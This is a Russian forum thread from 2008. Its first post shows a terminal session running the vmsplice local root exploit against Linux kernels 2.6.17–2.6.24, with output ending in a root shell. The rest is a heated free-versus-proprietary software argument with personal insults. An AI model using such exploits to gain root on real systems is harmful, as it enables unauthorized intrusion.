Автор Тема: Привет, линуксойды  (Прочитано 28921 раз)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
Привет, линуксойды
« : 11.02.08, 14:25:06 »
Повышение привилегий пользователя до суперпользователя. Уязвимы ядра 2.6.17 - 2.6.24
grotesque@sanarin:~$ cc -o root root.c
grotesque@sanarin:~$ ./root
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40149000 .. 0x4017b000
[+] root
root@sanarin:~# mkdir /privet
root@sanarin:~# ls /
bin  boot  dev  etc  home  lib  lost+found  mnt  old  opt  optsun  privet
proc  procc  root  sbin  sparc-linux  sparc-solaris  sys  tftpboot  tmp  usr
var
root@sanarin:~#

Иногда срабатывает не с первого раза. Со второго-третьего срабатывает.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
Re: Привет, линуксойды
« Ответ #281 : 15.02.08, 19:01:57 »
1)Больше 4 машин - можно . Не переживайте.
2) Кривые руки. Не переживайте, это лечится. Вот с мозгом сложнее будет. Вы всерьез поставили автоапрув на всусе? Удачи вам.
3) Насчет
Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?)
Согласен на 100%.
1. не переживаю, интересуюсь)
2. спасибо за астральную диагностику рук и мозга. я так не умею). Не хочу амазывацо - но я не главный одмин в конторе (т.е. не только я ковыряю машины гордо зовущиеся серверами), хотя автоаппрув на некоторые категории ставил я. Можт и лоханулся =)
You and me are the same
We don't know or care who's to blame
But we know that whoever holds the reins
Nothing will change
Our cause has gone insane

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #282 : 15.02.08, 19:25:31 »
> Если человеку реально хватает возможностей имеющегося стека свободного ПО для повседневных задач в бесплатном линуксе - нахрена ему марать совесть нелицензией или проприетарным ПО (ну или не марать и пользоваться фриварными =) ) и ставить виндовс?)

Убогие потребности некоторых - не повод восхвалять убогое ПО. Если кому-то там хватает, это не значит, это убожище годится людям со здоровой психикой.
 Что касается пропиретарщины, линуксойд охотно отравляет ядро пропиретарным драйвером nvidia. Охотно пользуетмя пропиретарной вмваре. Зачем ? А известно зачем. Ему пофик на идеи свободного открытого ПО. Линуксойду нужна ХАЛЯВА, а не свобода.
т.е. свободное ПО по дефолту убогое? =)

PS, такое ощущение что вас в подворотне "линуксойды" поймали и особо жестоко наказали...предвзятое отношение мяхко говоря удивляет. а особенно комментарии насчет чужого выбора, который подчас никому и не навязывается)

PPS, - драйвера нвидии и вмвар(плейер) - бесплатны, фанатизм некоторых насчет полностью открытого ПО я сам не до конца понимаю.

PPPS, - насчет халявы - эт личное дело каждого, ничего плохого в этом нет. Хочешь платить - плати, юзай одно, не хочешь - не плати - юзай другое. главное эт выбор)

++++
да, и еще, для интереса, нафига на спарке, в солярисе, опенГЛ? не могу придумать задачи, если честно..Хотя я солярисы видел только как сервера БД на фирмах, можт еще для чего нужны..
You and me are the same
Nothing will change

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #283 : 16.02.08, 12:46:27 »
> фанатизм некоторых насчет полностью открытого ПО я сам не до конца понимаю.

Постараюсь объяснить фанатизм некоторых. Видите ли, программирование - несколько не очень простой труд, требующий наличия мозга к тому же. Человек работает либо за идею либо за деньги. Третьего не дано. C чего вcё начиналось ? Некий финский студент объявил, что создает БЕСПЛАТНУЮ СВОБОДНУЮ операционную систему. Как вы думаете, куда бы он был послан, если бы сказал честно. Ребята. Напишите ка мне тут кода, его будут продавать некоторые фирмы, которые будут кормить меня и ещё несколько моих рабов. Далеко он был бы послан. При всём чудовищном надругательстве над идеями FSF эта идея о свободном ПО живёт и здравсвует. Отличный бизнес. Очень мягенько, смазывая лозунгами о свободе, леммингу вставляется обычная пропиретарщина. Обычная битва за умы школьников и студентов. Чтобы потом хитрожопые фирмы впаривали "бесплатный" линукс этому же леммингу, но уже в должности на предприятии, дороже венды в два с лишним раза раза. А скока человечков кормится на экплуацаии этого... У-у-у-у. Доказано независимыми исследованими, что совокупная стоимоть владения решенем на венде дешевле. Часто в несколько раз. Нет. Тупо ведутся на дешовую пропаганду.

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #284 : 16.02.08, 12:58:30 »
> да, и еще, для интереса, нафига на спарке, в солярисе, опенГЛ? не могу придумать задачи, если честно..Хотя я солярисы видел только как сервера БД на фирмах, можт еще для чего нужны..

Вам линуксойдам ничего не надо. Для задач. Надоели уже чесслово. OpenGL на спарках был тогда, когда его под вендой-то не было. Некоторое время назад, когда вы ходили пешком под стол, Sun имел почти весь рынок рабочих станций.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #285 : 16.02.08, 13:07:48 »
> да, и еще, для интереса, нафига на спарке, в солярисе, опенГЛ? не могу придумать задачи, если честно..Хотя я солярисы видел только как сервера БД на фирмах, можт еще для чего нужны..

Вам линуксойдам ничего не надо. Для задач. Надоели уже чесслово. OpenGL на спарках был тогда, когда его под вендой-то не было. Некоторое время назад, когда вы ходили пешком под стол, Sun имел почти весь рынок рабочих станций.
я не линуксойд. эт раз. спокойно переношу и видовс и линукс. тошнит (пока) только от висты
задал вопрос, вот и все. спасибо за спокойный полуответ. сдается мне, када я пешком под стол ходил, корпорации нВидиа тоже не было. жду ответа по существу, если не ломы, и желательно без путешествий в прошлое

про никому неизвестного финского студента - не вижу проблемы)
You and me are the same
Nothing will change

Оффлайн pantera

• Ветеран
  • У меня жОлтые глаза
    • Просмотр профиля
« Ответ #286 : 16.02.08, 13:11:45 »

Нервному не дают покоя лавры "никому неизвестного финского студента" :)

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #287 : 16.02.08, 13:15:19 »

я не линуксойд. эт раз. спокойно переношу и видовс и линукс. тошнит (пока) только от висты
задал вопрос, вот и все. спасибо за спокойный полуответ. сдается мне, када я пешком под стол ходил, корпорации нВидиа тоже не было. жду ответа по существу, если не ломы, и желательно без путешествий в прошлое

А нвидиа тут совершенно непричём. Не их изобретение. Тогда были другие монстры. Даже сама Sun баловалась. Если Вы не знаете, что такое такое рабочая станция и зачем там OpenGL - извините.  Тратить своё время на объясение таких вещей мне лень.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #288 : 16.02.08, 13:38:26 »
Цитата: Нервный link=topic=151571.msg1021497#msg1021497

А нвидиа тут совершенно непричём. Не их изобретение. Тогда были другие монстры. Даже сама Sun баловалась. Если Вы не знаете, что такое такое рабочая станция и зачем там OpenGL - извините.  Тратить своё время на объясение таких вещей мне лень.
прекрасно знаю что опенгл не нвидиевское детище.
разговор, напомню, был про драйвера нвидии для солярки
и я действительно с трудом представляю х86 рабочую станцию на солярисе. хуже хакинтоша получается, даром что официально.
чтото мне подсказывает что для этих целей для данной платформы есть специальные аппаратные рабочестанционные решения, желающим прикрутить нвидию(как вы сказали, серьезным компаниям) предлагають xorg. хотя по моему либо компания серьезная, либа прикручиваем нвидию, одно из двух
You and me are the same
Nothing will change

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #289 : 16.02.08, 13:48:56 »
> Нервному не дают покоя лавры "никому неизвестного финского студента" :)

Пофик на лавры. Проблема в пропиретарном ПО. Как, кем и из чего делается коммерческое ПО, неокрепшим умам лучше не знать. Костыль на костыле и сопли
в качестве клея. По-другому не будет никогда. Cделаешь хорошо работу - никто не купит новую версию. Это бизнес. Без соплей и идей, кроме заработать
денег ещё больше. Ваших денег. Как можно этого не осознавать. Как можно быть такими наивными. Как можно не понимать, что nvidia никогда не сделает
по-настоящему качественных драйверов. Про АМД я вообще молчу. Огромная проблема в некачествнном системном программном обеспечении. Венда глючит.
Синие экраны. Нужно совсем немного мозга, чтобы осознать простую вещь. Сама венда глючить не может. Венда - это вообще ничто. Такой, какая она у
большинства незадачливых пользователей, делает её некачественное системное ПО. Пропиретарное ПО. Феномен Линукс состоят в том, что было доказано,
что ПО, написанное за идею, качественнее пропиретарщины. Сабильнее. Производительнее. Удобнее. Однако. Рыба гниёт с головы. Деньги нужны на жизнь.
Фонд. Обычная схема отиыва и ухода. Какая пошлось. Я могу сравнить линукс образца 96-го года и 2006. Линуксойды нет. Тогда всё работало. Полностью
на открытых исходниках. Не работало только реально экзотическое железо. Не было холиваров. Линукс работал на 386-й машине. Реально и полность работал,
как на пентиуме. А не дёргался в конвульсиях в урезанном виде. Не дропалась поддержка технологий и протоколов. Куда всё это идёт, я вижу. Линуксойды - нет.
Думаете, драйверочки АМД, перекашивающие экран при смене пользователя, просто так появились ? Ах, да. Линуксойд пользователей не меняет.
Многопользовательская защита не нужна. Какже я мог забыть.
« Последнее редактирование: 16.02.08, 14:08:17 от Нервный »

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #290 : 16.02.08, 13:59:45 »
Цитата: Нервный link=topic=151571.msg1021497#msg1021497

прекрасно знаю что опенгл не нвидиевское детище.
разговор, напомню, был про драйвера нвидии для солярки
и я действительно с трудом представляю х86 рабочую станцию на солярисе. хуже хакинтоша получается, даром что официально.
чтото мне подсказывает что для этих целей для данной платформы есть специальные аппаратные рабочестанционные решения, желающим прикрутить нвидию(как вы сказали, серьезным компаниям) предлагають xorg. хотя по моему либо компания серьезная, либа прикручиваем нвидию, одно из двух

Некоторое время назад. Работа инженера на пицуке была моветоном. Тяжело поверить. Но это было так.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #291 : 16.02.08, 14:45:42 »
  Некоторое время назад. Работа инженера на пицуке была моветоном. Тяжело поверить. Но это было так.
Верицо запросто. но..
там была Нвидиа?
Повторный запрос, для тугочитающих - а сейчас? еще остались некрофилы антимоветонщики? Софт подобный для солярки развивается?
Если так рассуждать, то трудно поверить, но древнейший полуокаменевший мак-десктоп грузиццо, запускает ворд, сохраняет текст и выключается на порядок быстрее современного сВистобука

вы в упор не хотите отвечать на поставленный вопрос. То что вы преподносите как открывающую глаза правду мне прекрасно было известно и без вас.
You and me are the same
Nothing will change

Оффлайн rооt#

• VIP
  • Ветеран
    • Просмотр профиля
« Ответ #292 : 16.02.08, 15:13:14 »
Дагон, тебе оно нада с нервным сраца?
Выбрал для себя нормальное решение - админь на здоровье...
Нервному просто бабы не дают, вот он и пытается это компенсировать своими оргазмами на многочисленных форумах. Его вполне нормально можно читать... тока одно сообщение через три.

Melkor

• Гость
« Ответ #293 : 16.02.08, 15:13:43 »
Повторный запрос, для тугочитающих - а сейчас? еще остались некрофилы антимоветонщики? Софт подобный для солярки развивается?
Если так рассуждать, то трудно поверить, но древнейший полуокаменевший мак-десктоп грузиццо, запускает ворд, сохраняет текст и выключается на порядок быстрее современного сВистобука

вы в упор не хотите отвечать на поставленный вопрос. То что вы преподносите как открывающую глаза правду мне прекрасно было известно и без вас.
Сорри за офтоп.
 Офигенный у вас критерий качества ОС :)  Знаете сколько занимает перезагрузка промышленного сановского сервера с солярисом? 1 (один) ЧАС.
И чего ? Это говорит о том, что солярис сакс и в помойку?

Оффлайн rооt#

• VIP
  • Ветеран
    • Просмотр профиля
« Ответ #294 : 16.02.08, 15:15:38 »
Саш, тут про десктоп говорили.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #295 : 16.02.08, 15:19:12 »

Сорри за офтоп.
 Офигенный у вас критерий качества ОС :)  Знаете сколько занимает перезагрузка промышленного сановского сервера с солярисом? 1 (один) ЧАС.
И чего ? Это говорит о том, что солярис сакс и в помойку?
Такие цифры слышал, знаю. =)
Это не мой критерий выбора ОС, ни полразу =) Я просто проявил немного сарказма, пардон, был не понят) Нервный привел снимок явно не современной рабочей станции, вот и не удержался)
Мне просто интересно для каких задач сейчас на промышленном сервере(или рабочей станции) нужен опенгл, без подколов и прочего, интересно) В серьезной, как было сказано, компании.

А то вспоминается один _роутер_ на котором мною была обнаружена и аццка, и амарок и еще много чего..хоть компиза не было)))
You and me are the same
Nothing will change

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #296 : 16.02.08, 15:22:37 »
Дагон, тебе оно нада с нервным сраца?
а кто срецца?  :-)
я задаю вопросы, без попыток чтото доказать..его реакция на них является его личной проблемой, и обращать на неё внимание я пока не намерен..ответов хоцца, хотя бы чуть чуть по поставленным вопросам) А то спросишь человека про ладу калина(господипрости), а он то про бмв, то про карьерные эскаваторы, то про первый форд....
You and me are the same
Nothing will change

Тупой_Бот

• Гость
« Ответ #297 : 16.02.08, 21:21:56 »
ааааа у меня в игре небо в полосочку а земля в клеточку
во всем виноваты эти кривые драйверы NVIDIA, Windows и Балмер с Гейтсом!
Отстой эта винда!

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #298 : 16.02.08, 22:09:50 »
Верицо запросто. но..
там была Нвидиа?

нвидии там не было и быть не могло. самой нвидии тогда еще не было. прикладное ПО пишется под популярное системное. сан умудрилась проср@ть охрененный рынок. и в зтом ей помог  линукс. так а о чём у нас речь ? а вот о чём. солярис нужен только на платформе спарк. на пц тоже  нужен. но с обзательной поддержкой фирменных технологий. количество инсталляций это вооще ничто. какие задачи решаются - вот что интересно.

Оффлайн Нервный

• Ветеран
    • Просмотр профиля
« Ответ #299 : 16.02.08, 22:20:57 »
> Мне просто интересно для каких задач сейчас на промышленном сервере(или рабочей станции) нужен опенгл

для задач визуализации. как и раньше. у вас есть ресурсы обсчитывать процессором тысячи примитивов ? вы уверены, что opengl - это только 3d графика а-ля каунтер страйк. мне не интересно объяснять азы.

Оффлайн Дагон

• Старожил
  • Smile =)
    • Просмотр профиля
« Ответ #300 : 17.02.08, 02:28:04 »
> Мне просто интересно для каких задач сейчас на промышленном сервере(или рабочей станции) нужен опенгл

для задач визуализации. как и раньше. у вас есть ресурсы обсчитывать процессором тысячи примитивов ? вы уверены, что opengl - это только 3d графика а-ля каунтер страйк. мне не интересно объяснять азы.
о как...то есть еще остались _серьезные фирмы_ использующие солярис станции для визуализации...офигеть.

вам не интересно обьяснять азы(которые я и не просил объяснять, я просил ответ на вопросы), мне же не интересно описывать как сильно вы ошибаетесь за меня решая что я понимаю под опенГЛ :-)

You and me are the same
Nothing will change